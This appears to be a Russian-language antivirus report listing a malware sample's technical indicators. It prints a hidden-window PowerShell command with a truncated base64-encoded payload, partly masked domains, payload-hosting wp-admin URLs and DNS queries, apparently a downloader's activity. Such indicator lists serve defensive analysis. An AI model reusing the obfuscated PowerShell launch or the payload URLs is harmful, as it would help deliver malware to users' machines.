Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGEAeQB1AHgAegBwAHQAawB0AD0AJwBJAHcAcgB1AGcAagB1AGMAYwByAGoAJwA7ACQARABjAGQAeABzAGoAZABuAGIAZQAgAD0AIAAnADcAOQA2ACcAOwAkAFcAbwBmAGIAaAB4AGkAbAA9ACcAWgB0AHgAbwBoAGMAeQBqAHoAcQA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1432
- %TEMP%\978921.cvr
- 'ma###group.com':80
- 'gi####laocai.com':80
- http://ma###group.com/wp-admin/mtq/
- http://gi####laocai.com/wp-admin/Yz98SWY6/
- DNS ASK aj###namlak.com
- DNS ASK ma###group.com
- DNS ASK me###e-jp.com
- DNS ASK gi####laocai.com
- DNS ASK nn###tudio.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGEAeQB1AHgAegBwAHQAawB0AD0AJwBJAHcAcgB1AGcAagB1AGMAYwByAGoAJwA7ACQARABjAGQAeABzAGoAZABuAGIAZQAgAD0AIAAnADcAOQA2ACcAOwAkAFcAbwBmAGIAaAB4AGkAbAA9ACcAWgB0AHgAbwBoAGMAeQBqAHoAcQA... (со скрытым окном)